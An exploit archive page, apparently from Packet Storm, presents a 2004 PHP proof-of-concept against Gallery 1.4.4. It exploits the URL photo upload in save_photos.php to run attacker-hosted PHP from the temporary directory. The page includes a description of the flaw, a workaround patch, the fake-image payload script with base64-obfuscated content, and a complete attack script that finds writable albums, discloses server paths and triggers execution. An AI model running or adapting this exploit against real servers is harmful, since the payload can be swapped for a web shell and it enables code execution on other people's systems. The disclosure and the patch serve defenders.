exploit the possibilities

gallery-php.txt

gallery-php.txt
Posted Aug 26, 2004
Authored by aCiDBiTS

PHP based exploit for Gallery versions 1.4.4 and below that makes use of an arbitrary file upload flaw.

tags | exploit, arbitrary, php, file upload
MD5 | 05693fb275ee8e9d64e65892054a950b

gallery-php.txt

Change Mirror Download
#!/usr/bin/php

<?

/*

Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept
By aCiDBiTS acidbits_at_hotmail.com
<mailto:acidbits_at_hotmail.com?Subject=Re:%20Gallery%201.4.4%20save_photos.php%20PHP%20Insertion%20Proof%20of%20Concept>
17-August-2004

++ Vulnerability description ++

Gallery (http://gallery.sf.net/) is a PHP image gallery script.
Having
permission to upload photos in some album and the temporal directory is in
the webtree, then it is possible to create a file with any extension and
content. Tested in v 1.4.4, maybe older versions also vulnerable.

When uploading photos with the "URL method", they are saved in
the temporal
directory before processing them. Any file with any content is accepted.
After downloading, the file is processed (discarded if it is not an image)
and deleted from the temporal directory.

When the script downloads the file to the temporal directory
there's the
function set_time_limit() that by default waits 30 seconds to abort the
process if no more data is recieved and the transfer connection isn't
closed. If the temporal directory is in the webtree, during this 30 seconds
timeout we can access to the file, executing it.

There's also a "directory disclosure" that I've used to
determine if the
temporal directory is in gallery's webtree. It consists in sending a longer
filename than permited by the filesystem for the image upload name.

++ How this Proof of Concept works ++

1. You need to have a fake image script (like galfakeimg.php) in
a web
accessible by gallery to download it.
2. The script searches for an Album with "everybody" permission
to add
photos.
3. Checks if the temporal directory is in the webtree.
4. Tell gallery to download the fake_photo that contains the
script.
5. After XEC_TIMEOUT seconds waiting, it executes the temp file and
test.php is created.

Usage (in my debian box):
php4 -q ./gal_poc.php "http://192.168.1.22/galfakeimg.php"
"http://127.0.0.1/gallery"

NOTE: If there are no albums with public permissions to add
photos and you
have a valid login, modify the script adding your login cookie.

++ Workaround ++

save_photos.php, line 154:

$file = $gallery->app->tmpDir . "/photo.$name";

Insert:

if(strlen($name)>20) $name=substr($name,strlen($name)-20);
if
(!acceptableFormat(strtolower(ereg_replace(".*\.([^\.]*)$", "\\1",
$name)))) die( "\nInvalid file type!\n");
$file = $gallery->app->tmpDir . "/photo.$name";

++ galfakeimg.php ++

This is the content of galfakeimg.php. It has to be placed in a
remote web
directory accessible by the gallery script.

---8-<-------------------------8-<-------------------------8<---
<?php
echo "<?php
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);

?>\n";
for($x=0;$x<65535;$x++) echo " \n";
while(1){}
?>
---8-<-------------------------8-<-------------------------8<---

*/

define( XEC_TIMEOUT, 5);

echo "+--------------------------------------------------------------+\n|
Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept |\n| By
aCiDBiTS acidbits_at_hotmail.com
<mailto:acidbits_at_hotmail.com?Subject=Re:%20Gallery%201.4.4%20save_photos.php%20PHP%20Insertion%20Proof%20of%20Concept>
17-August-2004
|\n+--------------------------------------------------------------+\n\n";

if($argc<3) die("Usage: ".$argv[0]." URL_to_fake_photo
URL_to_Gallery\n\n");
$host=$argv[2];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
$fakephoto=$argv[1];

echo "[+] Obtaining PHPSESSID ... \n ";
$webc=get_web($host."view_album.php?set_albumName=".$album[0], 1, '');
$temp=explode("PHPSESSID=",$webc);
$temp1=explode(";",$temp[1]);
$phps="PHPSESSID=".$temp1[0].";";
echo $phps;

echo "\n\n[+] Getting album names ...\n ";
$webc=get_web($host, 0, $phps);
$temp=explode("set_albumName=",$webc);
$nalbum=0;
while($temp[($nalbum*2)+1]){
$temp1= explode( "\"", $temp[($nalbum*2)+1]);
$album[$nalbum]=$temp1[0];
echo $album[$nalbum]." ";
$nalbum++;
}
if(!$nalbum) die(" Failed!\n\n");

echo "\n\n[+] Searching an album with permissions to add photos ...";
$walbum='';
foreach( $album as $temp){
$webc=get_web($host."view_album.php?set_albumName=".$temp, 0,
$phps);
$webc=send_post( $host."save_photos.php",
urlencode("urls[]=".$host."&setCaption=1"), $phps);
echo "\n ".$temp." -> ";
if( ereg( "You are no allowed to perform this action", $webc) )
echo "No";
else {
echo "Yes";
$walbum=$temp;
}
}
if( !$walbum ) die ("\n\nFailed! No permissions in any album.\n\n");
echo "\n Using: ".$walbum;

echo "\n\n[+] Getting gallery & temporal directory paths ...";
$webc=get_web($host."view_album.php?set_albumName=".$walbum, 0, $phps);
$temp='/';
for($x=0;$x<256;$x++) $temp.='a';
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto.$temp)."&setCaption=1",
$phps);
$temp=explode("fopen(\"",$webc);
$temp1=explode("photo",$temp[1]);
$tmpd=$temp1[0];
echo "\n Temporal directory: ".$tmpd;
$temp=explode("resource in <b>",$webc);
$temp1=explode("save_photo",$temp[1]);
$scrptd=$temp1[0];
echo "\n Gallery directory: ".$scrptd;

if( !ereg( $scrptd, $tmpd) ) die ("\n\nTemporal directory is out of
gallery's webtree. Can't continue.\n\n" );

$temp=explode("/",$fakephoto);
end($temp);
$sname=current($temp);
echo "\n\n[+] Uploading $sname and executing it ...";
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto)."&setCaption=1", $phps);
//Maybe you'll need to wait some more seconds, check XEC_TIMEOUT
$webc=get_web($host.str_replace($scrptd,'',$tmpd)."photo.".$sname, 0,
$phps);

echo "\n\n Now go to: ".$host.str_replace($scrptd,'',$tmpd)."test.php";

die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
//||\\\\\n\n");

function get_web($url, $h, $cookie)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, $h);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}

function send_post($url,$data, $cookie)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_TIMEOUT, XEC_TIMEOUT) ;
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}

/* \ /
(Oo)
//||\\ */

?>
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    13 Files
  • 28
    May 28th
    18 Files
  • 29
    May 29th
    17 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close